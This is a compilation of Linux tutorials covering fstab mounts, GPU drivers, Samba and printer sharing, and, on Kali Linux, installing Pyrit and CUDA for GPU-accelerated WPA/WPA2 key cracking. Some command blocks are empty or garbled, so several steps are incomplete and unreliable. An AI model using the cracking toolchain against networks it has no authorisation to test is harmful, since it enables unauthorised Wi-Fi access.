The necessary commands, as well as procedures are well-documented in the Unofficial Ubuntu 6.10 (Edgy Eft) Starter Guide. Here, you can see the sample fstab file inside Kate text editor, for Kubuntu Linux.

Linux commands - fstab

Other options

Alternatively, if you have partitions formatted with FAT32 file system or you wish to be able to write to NTFS partitions from within Linux, you can use the following commands:

FAT32 read/write:

/dev/hda2 /media/data vfat iocharset=utf8,umask=000 0 0

NTFS read/write – requires installation of software that can write to NTFS drives.

apt-get install ntfs-3g
/dev/hda1 /media/data ntfs-3g defaults,locale=en_US.utf8 0 0

An exercise: Let’s assume we wish to be able to write to NTFS partition C, read-only NTFS partition F and use FAT32 partition G. In that case, the list of commands that we need to execute is:

apt-get install ntfs-3g

mkdir /media/windows
mkdir /media/data
mkdir /media/games

cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab


/dev/hda1 /media/windows ntfs-3g defaults,locale=en_US.utf8 0 0
/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0
/dev/hda3 /media/games vfat iocharset=utf8,umask=000 0 0

Installation of graphic card drivers

Please note that commands used in this subsection are for Nvidia drivers ONLY – I have several computers, ALL of which have Nvidia graphic cards – but some of the solutions presented work for both Nvidia and ATI cards.

Although I have already discussed the installation of graphic card drivers in my Installing SUSE Linux andInstalling Kubuntu Linux articles, I think a bit of extra guidance will not hurt anyone.

Basically, you can install the graphic card drivers using a Package Manager or via the command line. For most people, the first method should work flawlessly. The first method is embodied in these two commands – the download of the required package and the installation of the driver:

apt-get install nvidia-glx
nvidia-glx-config enable

Some people might prefer to install the drivers manually, with the X Windows stopped. To do this, you literally need to stop the desktop from running.

/etc/init.d/gdm stop
/etc/init.d/kdm stop
/etc/init.d/xdm stop

The desktop should vanish and be replaced with a command line. You will probably need to login. It is possible that you will only see a black screen and no command prompt. Do not be alarmed! Linux operating system usually has 7 virtual consoles. The first six consoles provide a text terminal with a login prompt to a UNIX shell. The 7th virtual console is used to start the X Windows.

In other words, it may occur that by stopping the X Windows you will have simply switched off the graphics AND remain in the 7th virtual console, therefore having no command line to work with. All you need to do is switch to one of the text consoles by pressing Alt + F1-6 on the keyboard. Now, you need to install your driver:


After the installation is complete, you should simply restart the X Windows.

/etc/init.d/gdm start
/etc/init.d/kdm start
/etc/init.d/xdm start

If you see an Nvidia splash logo, it means the driver has been successfully installed. Reboot your machine just to make sure. This is where you might encounter a problem.

Instead of the Nvidia logo, you will see an error message indicating that the X Server has been disabled and that you need to manually edit the settings in the xorg.conf file before being able to proceed to the desktop. Now, there are many possible reasons for such an error and trying to provide a general solution is impossible.

However, I have found the following argument to hold true for many cases: If you have setup your Linux distribution using the GUI installer, you will have probably used the default configurations and the generic kernel will have been installed. I this case, sometimes, the built-in Nvidia driver (nv) might interrupt with the installation. There are two methods for solving this problem.

Method 1: Alberto Milone’s envy package

Envy is a command-line application that will download the latest drivers for your card, clean up old drivers and install the new ones. Instructions for the usage can be found below the download links.

Method 2: Do it yourself

First, download the required driver. Then, execute the following commands:

The offending built-in driver needs to be disabled.

gedit /etc/default/linux-restricted-modules-common

Change the last line to DISABLED_MODULES=”nv”. This will prevent the built-in driver from loading and interrupting with your own installed driver.

Linux commands - linux-restricted

Now, you should remove all conflicting files from your system:

apt-get install linux-headers-`uname -r` build-essential gcc gcc-3.4 xserver-xorg-dev

apt-get –purge remove nvidia-glx nvidia-settings nvidia-kernel-common

rm /etc/init.d/nvidia-*

After the offenders are removed, you should install the drivers from the command line:

/etc/init.d/gdm stop
nvidia-xconfig –add-argb-glx-visuals
/etc/init.d/gdm start

Again, you should see the Nvidia splash logo. Reboot just to make sure there are no more surprises. This should get you up and running with the latest graphic card driver.

Network sharing

If you have more than one computer, you are probably sharing resources among them.There is no reason why you should not continue doing this if one of the machines is running a Linux distribution. Sharing can be accomplished in many ways. Perhaps the simplest is using Samba server. First, install Samba:

apt-get install samba

After the Samba server is installed, you will need to edit a few options in the configuration file to allow sharing privileges.

cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
gedit /etc/samba/smb.conf

In the configuration file, you will need to setup a number of parameters:

  • workgroup = workgroup_name – the name of the Workgroup for your LAN (e.g. HOME)
  • netbios name = netbios_name – without spaces; computer alias by which you will be able to call it across the network
  • security = user

After saving the configuration file, you will have to restart the Samba server:

/etc/init.d/samba restart

Now, select a folder that you wish to share.

Linux commands - samba share 1

If you have ticked the option Writable, you will be able to modify the contents of this folder. Finally, to be able to connect to this share from Windows, you will have to create a Samba user:

smbpasswd -a ‘name’

Under ‘name’ you should specify an existing UNIX user (e.g. roger). Do not forget the apostrophes! You will be asked to create a password. And finally, restart the Samba server again, for the changes to take effect. Now, the sharing itself. Very simple.

Windows > Linux

Start > Run > \\ OR \\netbios_name

When asked for username and password, provide the Samba user name, e.g. roger and the relevant password. And that’s it. Browse to the shared folder. If the shared folder is writable, you will be able to modify the contents.

Linux > Windows

Press Alt + F2. This will bring up the Run Command window. In the Command line, specify the IP address or the name of the computer that you wish to connect. You can see an example below:

Linux commands - samba sharing 2

And that’s it. Easy peasy lemon squeasy!

Printer sharing

Well now, folder and file sharing is really easy. What about the printers? Again, it is very simple. If you have a printer installed on a Windows machine, accessing it from a Linux machine will be easy. The rougher side of the coin is accessing a printer installed on a Linux machine from a Windows machine.First, you will have to allow your printer to be shared. Backup and then edit the Common UNIX Printer System configuration file.

cp /etc/cups/cupds.conf /etc/cups/cupsd.conf.bak
gedit /etc/cups/cupsd.conf

In the file, search for the entry #Listen and add or change as follows:

#Listen OR localhost:631 OR *:631
Listen /var/run/cups/cups.sock

CUPS listens on the port 631. If you use a static IP address for the Linux machine, you can specify only that IP. Otherwise, you might need to use a wildcard. Of course, you should be aware that an open port means a wee less security than before, so keep that in mind. After saving the changes, you will have to restart CUPS:

/etc/init.d/cupsys restart

Now that the printer is available, you will have to add it for the Windows machine.

Start > Settings > Printers and Faxes
File > Add Printer

… A network printer, or a printer attached to another computer …
… Connect to a printer on the Internet or on a home or office network …

When prompted for the driver, either select from a list or install it from a disk (like CD). And that’s it! You can now print from a Windows machine on a printer connected to a Linux machine.

Tip: If you are using a Lexmark printer, you will probably not be able to find the right Linux drivers for your printer. Worry not! Using generic drivers for Hewlett Packard printers will work remarkably well.

Other useful commands

Here’s a tiny sampling of some other useful tools that you might want to know. Be aware that the commands are presented in a generic way only. A variety of options (switches) can be used in conjunction with many of the commands to make their usage far more complex and effective.

Switching between runlevels

init 0-6


telinit 0-6

Backing up the X Windows configuration file

cp /etc/X11/xorg.conf /etc/X11/xorg.conf.bak

Sometimes, you may need or want to configure the X Windows manually:

dpkg-reconfigure xserver-xorg

Display system environment information

You can use the cat (concatenate) command, which will print the contents of the files into the terminal. To display the CPU parameters:

cat /proc/cpuinfo

To display the memory parameters:

cat /proc/meminfo

To find the version of your kernel and the GCC compiler:

cat /proc/version

Furthermore, to find out the version of your kernel:

uname -r

Listing information about files and folders

This command is the equivalent of the DOS dir command.


To display hidden files as well (starting with dot).

ls -a

Kill a process

Sometimes, you may start an application … only it does not really start. So you try again. But this time, your distro informs you that the process is already running. This can also happen in Windows. Sometimes, processes remain open and need to be killed. Before you can kill a process, you need to know its ID. The command below will list all running processes:

ps -elf

Then, kill the offending process by its ID.

kill PID

Alternatively, you can kill a process by its name. The below command will terminate all processes with the corresponding name (or names).

killall process_name


Well, that’s it, for now. Hopefully you have learned something.

If you have had problems with your software installations, compilation from sources, drivers, partitions, and sharing, this article may have helped you overcome some of the problems. Personally, the above tips cover about 90% of tasks that a normal user would have to confront as a part of his/her daily usage. Isn’t Linux so much fun? Well, have fun tweaking.

Install AMD ATI Proprietary FGLRX Driver + AMD APP SDK + Pyrit + CAL++ + Helpful ATIconfig FGLRX Commands

Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6

Kali dev team added new version of AMD ATI proprietary fglrx driver which is now available via Kali Linux repositories. That means, This guide is less complicated and everything should work out of the box instead of messing about with Debian Jessie repository.

Step by step guide to install proprietary fglrx driver in Kali Linux

Following instructions were tested on 64-bit Kali Linux 1.0.6 running Kernel version 3.12.6:

lsb_release -a


No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux Kali Linux 1.0.6
Release:    Kali Linux 1.0.6
Codename:   n/a

Step 1 (add official Kali Linux Repositories)

Check your /etc/apt/sources.list. If it’s anything different to the following, you need to fix it. You can follow this guide to add official Kali Linux Repositories if you’re not too sure on how to do it. For the sake of clarity I will keep things simple here.

leafpad /etc/apt/sources.list

Remove or comment out existing lines and add the following:

## Kali Regular repositories
deb kali main non-free contrib
deb kali/updates main contrib non-free
## Kali Source repositories
deb-src kali main non-free contrib
deb-src kali/updates main contrib non-free

Step 2 (update with apt-get)

Now we need to update and make sure we get the latest list from Kali Linux official repositories. So perform an apt-get update.

apt-get update

Step 3 (install Linux headers and recommended softwares)

Now that we have the correct repositories we can add these following recommended apps. The most important part is to add the correct headers.

apt-get install firmware-linux-nonfree 
apt-get install amd-opencl-icd 
apt-get install linux-headers-$(uname -r)

NOTE: You should be able to get all these from Kali Linux repositories as added/updated from Step 1 above. When this guide was written, all these were available in the Kali Repositories.

Step 4 (install fglrx drivers and control)

Almost done, just install fglrx drivers and control. The best part is that it’s all you need to do. Debian Jessie fixed the issues with fglrx and latest driver, so once you install these drivers, everything just works.

apt-get install fglrx-atieventsd fglrx-driver fglrx-control fglrx-modules-dkms -y

NOTE: At this point, you will see bunch of popups (we see those hardly in Linux, but aptitude pops up with request to update some libraries(opencl and glx) and restart services such as network etc., I have chosen YES to all of them. My installation of Kali is still working and I am yet to find a problem. Your experience might be different.

Once the installation if finished, we need to test if it was all good.

Step 5 (testing your installation and generate xorg.conf file)

Now that our installation is all good and went without an error, we need to test fglrx drivers. You can test fglrx using the following two commands:


Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 - Final - 11 - blackMORE Ops

If everything worked well, you can generate xorg.conf file using the following command

aticonfig --initial -f

xorg.conf file will be located at /etc/X11 folder.

Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 - Final - 2 - blackMORE Ops

Step 6 (update grub.cfg file and reboot)

Almost there. AMD cards needs the following parameters passed into grub.cfg during boot. Let’s do that: Edit the grub.cfg file:

leafpad /boot/grub/grub.cfg

you see this:

### BEGIN /etc/grub.d/10_linux ###
menuentry 'Debian GNU/Linux, with Linux 3.12-kali1-amd64' --class debian --class gnu-linux --class gnu --class os {
    insmod gzio
    insmod part_msdos
    insmod ext2
    set root='(hd0,msdos5)'
    search --no-floppy --fs-uuid --set=root 129deb3c-0edc-473b-b8e8-507f0f2dc3f9
    echo    'Loading Linux 3.12-kali1-amd64 ...'
    linux    /boot/vmlinuz-3.12-kali1-amd64 root=UUID=129deb3c-0edc-473b-b8e8-507f0f2dc3f9 ro initrd=/install/gtk/initrd.gz quiet
    echo    'Loading initial ramdisk ...'
    initrd    /boot/initrd.img-3.12-kali1-amd64

add radeon.modeset=0 in the end of the following line

linux    /boot/vmlinuz-3.12-kali1-amd64 root=UUID=129deb3c-0edc-473b-b8e8-507f0f2dc3f9 ro initrd=/install/gtk/initrd.gz quiet

So the line above becomes this:

linux    /boot/vmlinuz-3.12-kali1-amd64 root=UUID=129deb3c-0edc-473b-b8e8-507f0f2dc3f9 ro initrd=/install/gtk/initrd.gz quiet radeon.modeset=0

Note: 129deb3c-0edc-473b-b8e8-507f0f2dc3f9 UUID would be different for every PC. Use your one here.

grub.cfg - Install AMD ATI proprietary driver (fglrx) in Kali Linux 1.0.6 running Kernel version 3.12.6 - blackMORE Ops

Save and exit. Then reboot.


Once you reboot, your should be able to login in GUI and enjoy your AMD ATI proprietary driver (fglrx) in Kali Linux 1.0.6 running Kernel version 3.12.6.

Step 7 (run ATI Catalyst Control Center)

Run ATI Catalyst Control Center from Applications Menu > System Tools > Preferences > ATI Catalyst Control Center.

You should be able to launch amdcccle and make changes as required.


There’s more that you can do using Aticonfig. You can change fan speed or setup multiple monitors or directly check GPU temperatures. I have show them in the end of this post with a compilation of useful aticonfig commands. However, I found that some commands were removed from this version aticonfig. (AMD does it everytime they release a new driver). But most of the commands work. So feel free to check and report them back.

How To Install AMD APP SDK In Kali Linux?

Check FGLRX Installation

First check if fglrx module is installed:

lsmod | grep fglrx

You should get a response similar to:

fglrx 2635205 82
button 12945 1 fglrx

Installing AMD APP SDK

What is AMD APP Technology?

AMD APP technology is a set of advanced hardware and software technologies that enable AMD graphics processing cores (GPU), working in concert with the system’s x86 cores (CPU), to execute heterogeneously to accelerate many applications beyond just graphics. This enables better balanced platforms capable of running demanding computing tasks faster than ever, and sets software developers on the path to optimize for AMD Accelerated Processing Units (APUs).

What is the AMD APP Software Development Kit?

The AMD APP Software Development Kit (SDK) is a complete development platform created by AMD to allow you to quickly and easily develop applications accelerated by AMD APP technology. The SDK provides samples, documentation, and other materials to quickly get you started leveraging accelerated compute using OpenCL™, Bolt, or C++ AMP in your C/C++ application, or Aparapi for your Java application.

What is OpenCL™?

OpenCL™ is the first truly open and royalty-free programming standard for general-purpose computations on heterogeneous systems. OpenCL™ allows programmers to preserve their expensive source code investment and easily target both multi-core CPUs and the latest APUs and discrete GPUs, such as those from AMD. Developed in an open standards committee with representatives from major industry vendors, OpenCL™ gives users what they have been demanding: a cross-vendor, non-proprietary solution for accelerating their applications on their CPU and GPU cores.

Download AMD APP SDK x2.7

Download AMD APP SDK v2.7 from:

AMD Download Archive

Install SDK

Install the SDK:

mkdir amdappsdk
cp AMD-APP-SDK-v2.7-lnx64.tar amdappsdk/
cd amdappsk
tar -xvf AMD-APP-SDK-v2.7-lnx64.tar

Edit /root/.bashrc, add the following lines to the end of the file:


Save and quit, then issue the following command:

source ~/.bashrc

How To Install Pyrit In Kali Linux?

Check FGLRX Installation

First check if fglrx module is installed:

lsmod | grep fglrx

You should get a response similar to:

fglrx 2635205 82
button 12945 1 fglrx

Check AMD APP SDK Installation

Check if AMD APP SDK is installed. If not installed, follow this guide to install it.

Check CAL++ Installation

Check if CAL++ is installed. If not installed, follow this guide to install it.

Why Pyrit?

Pyrit allows to create massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock, it is currently by far the most powerful attack against one of the world’s most used security-protocols.

Install Pyrit in Kali

Install prerequisites

apt-get install libpcap-dev

Remove existing installation of pyrit

apt-get remove --purge pyrit

If you are not using a clean install of Kali (not recommended), you may need to issue the following command:

rm -r /usr/local/lib/python2.7/dist-packages/cpyrit/

Download pyrit

svn checkout pyrit_svn

Install Pyrit

cd pyrit_svn/pyrit/
./ build install

Install CAL++ plugin

cd ../cpyrit_calpp/


Edit file and modify/replace the followings:
find VERSION = '0.4.0-dev' and replace with VERSION = '0.4.1-dev'
find CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include')) and replace with

CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))

Save and quit, then issue the following command:

./ build install

There will be several warnings, but hopefully no errors and everything will be installed.

Test cpyrit

List available core

pyrit list_cores


The following cores seem available...

#1: 'CAL++ Device #1 'AMD GPU DEVICE''
#2: 'CPU-Core (SSE2)'
#3: 'CPU-Core (SSE2)'
#4: 'CPU-Core (SSE2)'

Benchmark Pyrit

pyrit benchmark


Computed 7548.89 PMKs/s total.
#1: 'CAL++ Device #1 'AMD GPU DEVICE'': 5599.3 PMKs/s (RTT 1.4)
#2: 'CPU-Core (SSE2)': 685.6 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2)': 688.5 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 691.9 PMKs/s (RTT 3.0)

How to install CAL++ in Kali Linux?

Check FGLRX Installation

First check if fglrx module is installed:

lsmod | grep fglrx

You should get a response similar to:

fglrx 2635205 82
button 12945 1 fglrx

If not installed follow this guide to install it.

Check AMD APP SDK Installation

Check if AMD APP SDK is installed. If not installed follow this guide to install it.

Installing CAL++

CAL++ is a simple library to allow writing ATI CAL kernels directly in C++. The syntax is very similar to OpenCL. Also C++ wrapper for CAL is included.

This project was registered on on Feb 19, 2010.

Install prerequisites:

apt-get install cmake libboost-all-dev

Download CAL++

Download calpp 0.90 from: SourceForge CAL++ Website

Install CAL++

tar -xvf calpp-0.90.tar.gz
cd calpp-0.90/

Edit CMakeLists.txt:

Find the lines starting with FIND_LIBRARY and FIND_PATH and replace them with this:


Save and quit,

Make and Install CAL++

Issue the following commands:

cmake .
make install

Helpful ATIconfig FGLRX Commands

ATI Proprietary Linux Driver (ATIconfig fglrx) Features

The ATI Proprietary Linux driver (ATIconfig fglrx) provides TV Output support for ATI graphics cards that support TV out. The ATI Proprietary Linux (ATIconfig fglrx) driver also allows for the following monitor arrangements:

  1. Single Head Mode (single display)
  2. Clone Mode (same content on both screens)
  3. Mirror Mode (same content on both screens, with identical display resolution and refresh rates)
  4. Big Desktop (one desktop stretched across two screens)
  5. Dual Head (separate instances of X running on each screen)

ATI Config Linux Edition - blackMORE Ops

ATI Workstation Product Support

The ATI Proprietary Linux driver is designed to support the following ATI Workstation products:

  • FireGL™ V7350
  • FireGL™ V3300
  • FireGL™ X1-128
  • FireGL™ V7300
  • FireGL™ V3200
  • FireGL™ X1-256p
  • FireGL™ V7200
  • FireGL™ V3100
  • FireGL™ 8800
  • FireGL™ V7100
  • FireGL™ X3-256
  • FireGL™ 8700
  • FireGL™ V5200
  • FireGL™ X3
  • FireMV™ 2200 (Single card configuration)
  • FireGL™ V5100
  • FireGL™ X2-256
  • Mobility™ FireGL™ V5000
  • FireGL™ V5000
  • FireGL™ Z1-128
  • Mobility™ FireGL™ 9100
  • FireGL™ V3400
  • FireGL™ T2-128
  • Mobility™ FireGL™ T2

ATI Mobility™ Product Support

The ATI Proprietary Linux driver is designed to support the following ATI Mobility™ products:

  • Mobility™ Radeon® X1800
  • Mobility™ Radeon® 9800
  • Mobility™ Radeon® X1600
  • Mobility™ Radeon® 9600
  • Mobility™ Radeon® X1400
  • Mobility™ Radeon® 9550
  • Mobility™ Radeon® X1300
  • Mobility™ Radeon® 9500
  • Mobility™ Radeon® X800
  • Mobility™ Radeon® 9000
  • Mobility™ Radeon® X700
  • Mobility™ Radeon® 9200
  • Mobility™ Radeon® X600
  • Radeon® Xpress 200M series
  • Mobility™ Radeon® X300

ATI Integrated Product Support

The ATI Proprietary Linux driver is designed to support the following ATI Integrated products:

  • Radeon® Xpress 200 series
  • Radeon® 9100 IGP
  • Radeon® 9200 IGP
  • Mobility™ Radeon® 9000 IGP series
  • Mobility™ Radeon® 9100 IGP series

Caution: This software driver provides 2D support only for the ATI Radeon® 9100 IGP and ATI Radeon® 9100 PRO IGP.

ATI Desktop Product Family Support

The ATI Proprietary Linux driver is designed to support the following ATI desktop products:

  • Radeon® X1900 series
  • Radeon® 9800 series
  • Radeon® X1800 series
  • Radeon® 9600 series
  • Radeon® X1600 series
  • Radeon® 9200 series
  • Radeon® X1300 series
  • Radeon® 9000 series
  • Radeon® X850 series
  • Radeon® 9700 series
  • Radeon® X800 series
  • Radeon® 9550 series
  • Radeon® X700 series
  • Radeon® 9500 series
  • Radeon® X600 series
  • Radeon® 9100 series
  • Radeon® X300/X550 series
  • Radeon® 8500 series

Just make sure your product is listed here, otherwise following commands are not supported.

Helpful ATIconfig commands

Initial setup (creates device section using fglrx)

 aticonfig --initial

Enable Video acceleration (Xv Overlay)

     aticonfig -overlay-type=Xv

Force fglrx to use kernel’s AGP driver instead of own implementation

(only use when internal agpgart doesn’t work)

    aticonfig --internal-agp=off

Note: Newer fglrx driver versions do not include an internal AGPGART so the kernel agpgart is used no matter what.

Use extended desktop with two monitors (dual-head and big desktop)

    aticonfig --initial=dual-head --screen-layout=right

This command will generate a dual head configuration file with the second screen located to the right of the first screen.

Setup big Desktop to Horizontal and Set Overlay on the Secondary Display

    aticonfig --dtop=horizontal --overlay-on=1

This command will set up big desktop to horizontal and set overlay on the secondary display.

If black borders doesn’t remove try this :

 aticonfig --query-monitor # to see monitors
 aticonfig --query-dispattrib=tmds2 #to see supported values
 aticonfig --set-dispattrib=tmds2,sizeX:1920 # to set X resolution
 aticonfig --set-dispattrib=tmds2,sizey:1080 # to set Y resolution
 aticonfig --set-dispattrib=tmds2,positionX:0 # to set X position to 0
 aticonfig --set-dispattrib=tmds2,positionY:0 # to set Y position to 0

 Print information about power states.

    aticonfig --list-powerstates

Or, for us lazy folk, the shorter version is

   aticonfig --lsp

Set a power state to the lowest (battery friendly)

    aticonfig --set-powerstate=1

Note: check out available power states using aticonfig –list-powerstates
Note: this option does not work when an external monitor is connected

Print information about connected and enabled monitors

    aticonfig --query-monitor

How to enable two monitors on the fly

Assume you have two monitors already setup correctly
This example enables laptop internal monitor (lvds) and external monitor (crt1)

    aticonfig --enable-monitor=lvds,crt1 --effective=now

Note: aticonfig –enable-monitor=STRING,STRING where STRING can be one of the following set, separated by commas: none,crt1,crt2,lvds,tv,tmds1,tmds2,auto.

Only 2 displays can be enabled at the same time. Any displays that are not on the list will be disabled.

Note: check out connected and enabled monitors using aticonfig –query-monitor

Turn off the second monitor on the fly and start to use only laptop internal monitor (lvds)

    aticonfig --enable-monitor=lvds --effective=now

Swap monitors on the fly when using big desktop mode

    aticonfig --swap-monitor --effective=now

Note: This only works for big desktop setup. This will swap the contents on the two monitors.

Get temperature:

   aticonfig --odgt

Get Fan speed:

   aticonfig --pplib-cmd "get fanspeed 0"

Replace 0 with the FAN number. i.e. 0, 1. etc.

Set Fan Speed:

   aticonfig --pplib-cmd "set fanspeed 0 40"

Where 0 is the fan number and 40 is the percent of speed you want it to run.

ATIConfigHelp Page

Install Proprietary NVIDIA Driver + kernel Module CUDA and Pyrit on Kali Linux

Install Proprietary NVIDIA Driver On Kali Linux – NVIDIA Accelerated Linux Graphics Driver

This guide explains how to install proprietary “NVIDIA Accelerated Linux Graphics Driver” or NVIDIA driver on Kali Linux system. If you are using Kali Linux and have NVIDIA graphics card then most likely you are using open source NVIDIA driver nouveau. You can see it by lsmod | grep nouveau command. nouveaudriver works quite well, but if you want to use 3D acceleration feature or want to use GPU based applications (such as CUDA and GPU pass through) then you need to install proprietary NVIDIA driver. The proprietary “NVIDIA Accelerated Linux Graphics Driver” provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server. It is a binary-only Xorg driver requiring a Linux kernel module for its use. The first step is to fully update your Kali Linux system and make sure you have the kernel headers installed.

Where you had to download NVIDIA Driver (CUDA) manually and edit grub.cfg file to make everything work. Because it will be a long guide, I had to divide it into two parts:

You use the first guide to install NVIDIA Driver. If you want GPU acceleration, (cudahashcat, GPU pass through etc.) keep reading and follow the second guide to complete your installation. I’ve included as much details I can, including troubleshooting steps and checks but I would like to hear your part of the story, so leave a comment with your findings and issues.

The new NVIDIA Driver

The new Linux binary NVIDIA drivers nvidia-kernel-dkms builds the NVIDIA Xorg binary kernel module needed by NVIDIA driver, using DKMS. Provided that you have the kernel header packages installed, the kernel module will be built for your running kernel and automatically rebuilt for any new kernel headers that are installed. The binary NVIDIA drivers provide optimized hardware acceleration of OpenGL applications via a direct-rendering X Server for graphics cards using NVIDIA chip sets. AGP, PCIe, SLI, TV-out and flat panel displays are also supported. NVIDIA Added support for the following GPU including fixing some issues: (existing GPU’s are already supported).

  • GeForce GT 710
  • GeForce 825M
  1. Fixed a regression that prevented NVIDIA-installer from cleaning up directories created as part of the driver installation.
  2. Added a new X configuration option “InbandStereoSignaling” to enable/disable DisplayPort in-band stereo signaling.
  3. Fixed a bug that caused PBO downloads of cube map faces to retrieve incorrect data.
  4. Fixed a bug in NVIDIA-installer that resulted in spurious error messages when opting out of installing the NVIDIA kernel module or source files for the kernel module.
  5. Added experimental support for ARGB GLX visuals when Xinerama and Composite are enabled at the same time on X.Org xserver 1.15.

See the details about this driver in NVIDIA official website:

Debian Linux usually ports that Official Driver to fit it’s requirements. The NVIDIA driver graphics processing unit (GPU) series/codename of an installed video card can usually be identified using the lspci command. For example:

lspci -nn | grep VGA

My settings

My PC got the following configuration:

I’ve installed everything in a brand new Kali Linux 1.0.6 installation, fully updated and upgraded. Before you do anything, you of course add the Official Kali Linux repository. Once I’ve added the correct Kali Official repositories, I’ve issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

If you’ve completed this part, move on to the next instruction.

Step 1: Install Linux headers

Install Linux headers as those will be required to build NVIDIA Driver modules.

aptitude -r install linux-headers-$(uname -r)

Where -r means install all recommended packages as well.   

Step 2: Install NVIDIA Kernel

Next I installed NVIDIA Kernel

apt-get install nvidia-kernel-$(uname -r)

Step 3: Install NVIDIA Driver Kernel DKMS

We’re almost ready. You can now install new NVIDIA driver nvidia-kernel-dkms by using the following command:

aptitude install nvidia-kernel-dkms

Including dependencies, this is about 24MB is size, depending on how fast Kali repo is working, you might have to wait few minutes. You will get 2 popups, the first one about rebooting after you’ve installed NVIDIA drivernvidia-kernel-dkms that it will disable open source NVIDIA driver nouveau and the second one about xorg.conf file in /etc/X11/ folder.

Press OK on both popups.

Step 4: Install xconfig NVIDIA driver application

If you go through the NVIDIA driver README document, you will see you need to create new XORG server configuration file xorg.conf or modify existing xorg.conf to tell it to load NVIDIA Driver module.nvidia-xconfig package make this task quite easier. All you need to do is to install and execute it.

aptitude install nvidia-xconfig

Step 5: Generate Xorg server configuration file

Now that we have installed nvidia-xconfig package, issue the following command to generate Xorg server configuration file.


It will rename any existing xorg.conf file and create a new one. As directed by NVIDIA drivernvidia-kernel-dkms, reboot your machine to complete installation.

Step 6: Confirming your installation

At this point you should be able to login to your system in Graphical User Mode (GUI). In case you can’t, follow the troubleshooting section at the bottom of this article. As always, we need to check if everything went as expected.

Step 6.a: Check GLX Module

First check if system is using glx module.

glxinfo | grep -i "direct rendering"

It should output “direct rendering: Yes”

Run glxinfo- 7 - Install proprietary NVIDIA driver on Kali Linux - blackMORE Ops

If you do not have glxinfo then first install mesa-utils package then again issue above command and check output

aptitude install mesa-utils

Step 6.b: Check NVIDIA Driver Module

Check if NVIDIA module loaded.

lsmod | grep nvidia

If it produces output like nvidia 9442880 28 or something similar (numbers could be different at your system) then NVIDIA module is loaded.

Step 6.c: Check for Open source NVIDIA Driver nouveau module

Just to be sure Open source NVIDIA Driver nouveau module NOT loaded, issue following command

lsmod | grep nouveau

Run lsmod grep nouveau- 9 - Install proprietary NVIDIA driver on Kali Linux - blackMORE Ops

It should NOT produce any output. If it produces output then something is wrong.

Step 6.d: Confirm if open source NVIDIA Driver nouveau was blacklisted

I like this new NVIDIA Driver. It blacklists Open source NVIDIA Driver nouveau by default. That means less work for us to do. You can confirm it by checking files in the following directory:

cat /etc/modprobe.d/nvidia.conf
cat /etc/modprobe.d/nvidia-blacklists-nouveau.conf
cat /etc/modprobe.d/nvidia-kernel-common.conf


You might get a black screen after installing NVIDIA Driver. Following are your options to fix it:

Troubleshooting Step A: Fixing black screen with a cursor problem

Simply press CTRL + ALT + F1 and login. Type the following


You should now be able to log in using the GDM3 GUI.

Troubleshooting Step B: Delete xorg.conf file

Press CTRL + ALT + F1 and login. Type the following

rm /etc/X11/xorg.conf

After reboot, you should be able to log in using the GDM3 GUI.

Troubleshooting Step C: remove NVIDIA Driver

Press CTRL + ALT + F1 and login. Type the following

apt-get remove nvidia-kernel-dkms

After reboot, you should be able to log in using the GDM3 GUI.


This concludes my general instructions on how to install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver. NVIDIA Optimus users should be able to follow the same instructions, however, as I said before, feel free to share your side of story on how your installation went and correct my guide if required. I am open for discussion and will try to reply back to your comments the earliest possible. For those curious minds, try installing nvidia-settings and see how that goes. NVIDIA Settings will remove NVIDIA Driver but I did manage to make it work with some tinkering. I will try to write another guide on that (NVIDIA Settings presents you with a GUI X Config Window and you can see GPU Temperature and more info)… The proprietary “NVIDIA Accelerated Linux Graphics Driver” provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server, in shoty your NVIDIA Driver give you better display and 3D rendering then you’re all done. You can now play 3D Games. Let me know if you want any specific Linux supported games on Kali and I can write up an article on that. But if you want to run applications that uses NVIDIA Kernel Module CUDA, Pyrit and Cpyrit for GPU processing then you will also need to install CUDA drivers, replace offical Pyrit and install Cpyrit. Find out if your Graphics Card supports CUDA in the following page from NVIDIA

Mine does,

  • GeForce 210.

Next guide will show you how to Install NVIDIA Kernel Module CUDA and Pyrit in Kali Linux – CUDA, pyrit and cpyrit.   Thanks for reading. If this guide helped you to install NVIDIA Driver, please share this article and follow us in Facebook/Twitter.

Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda

In this guide, I will show how to install NVIDIA driver kernel Module CUDA, replace stock Pyrit, and install Cpyrit.At the end of this guide, you will be able to use GPU acceleration for enabled applications such as cudaHashcat, Pyrit, crunch etc.

You use the first guide to install NVIDIA Driver on Kali Linux. I would assume you followed the first guide and completed all steps there and would like to enable GPU acceleration, (cudahashcat, GPU pass through etc.) on your Kali Linux.

CUDA Toolkit

The NVIDIA® CUDA® Toolkit provides a comprehensive development environment for C and C++ developers building GPU-accelerated applications. The CUDA Toolkit includes a compiler for NVIDIA GPUs, math libraries, and tools for debugging and optimizing the performance of your applications. You’ll also find programming guides, user manuals, API reference, and other documentation to help you get started quickly accelerating your application with GPUs. You can read a lot more here in NVIDIA Developers official webpage:

CUDA Toolkit


Following are the prerequisite before you start following this guide:

Prerequisite 1: add Official Kali Linux repository.

I’ve added the correct Kali Official repositories and issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Prerequisite 2: Install proprietary NVIDIA driver on Kali Linux

